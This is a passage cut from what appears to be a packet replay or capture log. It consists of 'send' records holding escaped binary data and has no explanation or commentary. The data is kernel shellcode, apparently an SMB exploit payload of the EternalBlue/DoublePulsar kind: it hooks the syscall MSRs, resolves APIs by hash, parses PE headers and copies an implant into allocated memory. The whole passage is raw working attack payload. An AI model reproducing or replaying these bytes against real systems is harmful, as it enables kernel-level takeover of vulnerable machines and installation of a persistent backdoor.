\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 20, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 21, 